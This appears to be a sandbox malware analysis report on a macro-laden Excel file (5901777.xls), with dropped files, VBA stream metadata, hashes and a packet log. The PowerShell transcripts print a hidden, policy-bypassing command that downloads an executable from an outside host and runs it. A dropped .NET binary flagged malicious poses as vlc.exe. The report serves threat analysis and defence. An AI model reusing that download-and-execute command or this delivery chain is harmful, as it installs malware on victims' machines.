                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AC884895-1FFB-4FFD-9AEA-0EAADDCF8F32
                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):129952
                                              Entropy (8bit):5.378326234389065
                                              Encrypted:false
                                              SSDEEP:1536:mcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:0mQ9DQW+zBX8u
                                              MD5:DF0C880894C2F78E9AD029585FF4FCA7
                                              SHA1:77216174BF47B52075FDB840151377A6682CD90E
                                              SHA-256:284F18BFBB35013569813423ECE460368B4AE64FD5631B444BB8B82F7FC72BD8
                                              SHA-512:2058245A6AFF413CC97265F041A3690D5CE19F3522320ECD468602CA5BC35393AEE9C925065111629180275581B808B63D7D3B42207DDE95F2A98BF1924D16E0
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-27T10:36:40">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.9260988789684415
                                              Encrypted:false
                                              SSDEEP:3:Nlllulb/lj:NllUb/l
                                              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: @...e................................................@..........
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgkruib0.ygj.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eynwfcx2.3ju.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljxb34qx.vzy.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryxuahqv.3dg.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.0kLC5vT1.20201127113806.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):3951
                                              Entropy (8bit):5.421598276555511
                                              Encrypted:false
                                              SSDEEP:96:BZIh5N9I1qDo1ZrSieXmZah5N9I1qDo1ZIseX2eXSrEzyeXSrEzyeXSrEzTZ7:leXgeX2eX8eX8eXn
                                              MD5:5157FE1088C77BC92F20BF23DB040ACB
                                              SHA1:108D7C64C82A178B2E12F50983FC746C8C008621
                                              SHA-256:DE128F5C758AE0CDE62A7074EBBBECFE96BACA2D30503A2CF49B54CD6D026309
                                              SHA-512:91BD8AC33B8459D11CDBB63EA7F4083395EE152671CA459B58560D2AE4ABDA4D4AC8752D64EDB05FC05F69C9F36153B5DCB0AEDC2A87ECEF04F615C3028F40C8
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5184..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.b3BihSD7.20201127113805.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1219
                                              Entropy (8bit):5.282450136999881
                                              Encrypted:false
                                              SSDEEP:24:BxSAsxvBn5x2DOXiRbWoPuv18WMHjeTKKjX4CIym1ZJXQaPuv1WnxSAZI:BZwvh5oOqioPuv1HMqDYB1ZLPuv14ZZI
                                              MD5:09AC619D5065DA9F92352D74207C3020
                                              SHA1:FAF52D46822C6571C60E32E0C79D1D6947BCA100
                                              SHA-256:7567B37EB56FECE10EC3C5924D2EF4576ABF88080D9C09439B44104FBB182E5B
                                              SHA-512:FB281DD2CA0977C9B659171CE9DC89A957F098AF7D3A8537A1C54D30F94448609C2319D9BE6A1FEA042417CE15CA0FE4D3E286C1FC0CF0CC9FAAFEF41F95E54E
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5164..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Last Saved By: Dell, Create Time/Date: Fri Nov 27 09:06:11 2020, Last Saved Time/Date: Fri Nov 27 09:06:12 2020, Security: 0
                                              Entropy (8bit):7.862065005946057
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:5901777.xls
                                              File size:208384
                                              MD5:899e5af08f0794f0131adbf03f841045
                                              SHA1:242508434986d472b0b83387ec8d5d33888baa29
                                              SHA256:74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
                                              SHA512:e43293d7d37a19a7564e076fdb55ea9594758246504cbd504653f8b3c60a94806313145c13366f21bcc85b98c407262f63bfdb25511738899fcef4cb4cf665a2
                                              SSDEEP:6144:gk3hOdsylKlgryzc4bNhZF+E+W2knu17K4g62FpqDIWPIVirJNl15bdVwHmGRl:61+4v2FpqDAcrJN1bbwGGR
                                              File Content Preview:........................>.......................................................b.......d......................................................................................................................................................................

                                              File Icon

                                              Icon Hash:74ecd4c6c3c6c4d8

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "5901777.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Author:Dell
                                              Last Saved By:Dell
                                              Create Time:2020-11-27 09:06:11
                                              Last Saved Time:2020-11-27 09:06:12
                                              Security:0

                                              Document Summary

                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:983040

                                              Streams with VBA

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 742
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:742
                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D . . 2 P . . . . S u b . . . _ B e f o r . e C l . 9 ( C a n . c e l A s B . o o l e a n ) . . . R a n g e ( " . l 1 : x 2 2 " ) . . S e l e c t . . . . . i
                                              Data Raw:01 e2 b2 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                              VBA Code Keywords

                                              Keyword
                                              .ShrinkToFit
                                              .TintAndShade
                                              lctheufps
                                              VB_Name
                                              VB_Creatable
                                              xlCenter
                                              lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
                                              "ThisWorkbook"
                                              VB_Exposed
                                              .VerticalAlignment
                                              .WrapText
                                              .Orientation
                                              Selection.Borders(xlDiagonalUp).LineStyle
                                              .MergeCells
                                              xlThin
                                              psisbdmpm
                                              Workbook_BeforeClose(Cancel
                                              VB_Customizable
                                              .ColorIndex
                                              .AddIndent
                                              Selection.Font.Italic
                                              .Weight
                                              Selection.Font.Bold
                                              xlContext
                                              yqukhazhshmodqbmnkwuescdsportzmbady
                                              .HorizontalAlignment
                                              xlBottom
                                              .LineStyle
                                              VB_TemplateDerived
                                              xlNone
                                              xlUnderlineStyleSingle
                                              Selection.Borders(xlDiagonalDown).LineStyle
                                              Selection.Borders(xlEdgeTop)
                                              Selection
                                              False
                                              Selection.Borders(xlEdgeLeft)
                                              .IndentLevel
                                              Attribute
                                              Selection.Font.Underline
                                              Private
                                              .ReadingOrder
                                              xlContinuous
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              Boolean)
                                              VBA Code
                                              VBA File Name: oldgcaiba.cls, Stream Size: 172
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/oldgcaiba
                                              VBA File Name:oldgcaiba.cls
                                              Stream Size:172
                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " o l d . g c a i b a " . " . . . B a s . . 0 { . 0 0 0 2 0 8 2 0 6 - . . . . C . . . . 4 6 . } . | G l o b a l ! . . S p a c . . F a . l s e . % C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . . @ T e m . p l a t e D e r . i v . . C u s t o . m i z . D . 2
                                              Data Raw:01 a8 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 6f 6c 64 00 67 63 61 69 62 61 22 0d 22 0a 0a 80 42 61 73 02 80 30 7b 00 30 30 30 32 30 38 32 30 36 2d 00 10 04 08 43 05 12 03 00 34 36 02 7d 0d 7c 47 6c 6f 62 61 6c 21 01 ca 53 70 61 63 01 92 46 61 08 6c 73 65 0c 25 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72

                                              VBA Code Keywords

                                              Keyword
                                              "oldgcaiba"
                                              False
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.18482950044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:228
                                              Entropy:2.83826051843
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o l d g c a i b a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8e 00 00 00 02 00 00 00 e4 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:176
                                              Entropy:3.03638398782
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . D e l l . . . . @ . . . . . . . . . . . @ . . . . . b . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 50 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 200639
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:200639
                                              Entropy:7.92744162749
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P K . 8 . . . . . . . X . @
                                              Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 478
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:478
                                              Entropy:5.17133809761
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = o l d g c a i b a / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 6 9 4 3 A D 6 4 6 F A D 8 F E D 8 F E D C 0 2 D C 0 2 " . . D P B = " D 1 D 3 7 D 6 2 9 A 6 2 9 A 9 D 6 6 6 3 9 A 4 2 4 0 E 8 2 B D 8 8 8 E D
                                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6f 6c 64 67 63 61 69 62 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:71
                                              Entropy:3.1232478398
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . o l d g c a i b a . o . l . d . g . c . a . i . b . a . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 6f 6c 64 67 63 61 69 62 61 00 6f 00 6c 00 64 00 67 00 63 00 61 00 69 00 62 00 61 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:ISO-8859 text, with no line terminators
                                              Stream Size:7
                                              Entropy:1.84237099318
                                              Base64 Encoded:False
                                              Data ASCII:. a . . . . .
                                              Data Raw:cc 61 ff ff 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 224
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:224
                                              Entropy:5.5463550152
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C * " . . + . . . . ^ . . . o l d g c a i b . a G . . . . . l . . d . g . c . a . 4 j b . . . . . 2 . . . @ . . . .
                                              Data Raw:01 dc b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 27, 2020 11:38:08.703929901 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.777448893 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.824160099 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.824331045 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.837831020 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.895749092 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.896704912 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.898339987 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.956010103 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.958857059 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.958878994 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.958959103 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.959620953 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959639072 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959748030 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.959760904 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959779978 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959791899 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959805012 CET8049743162.223.88.131192.168.2.3
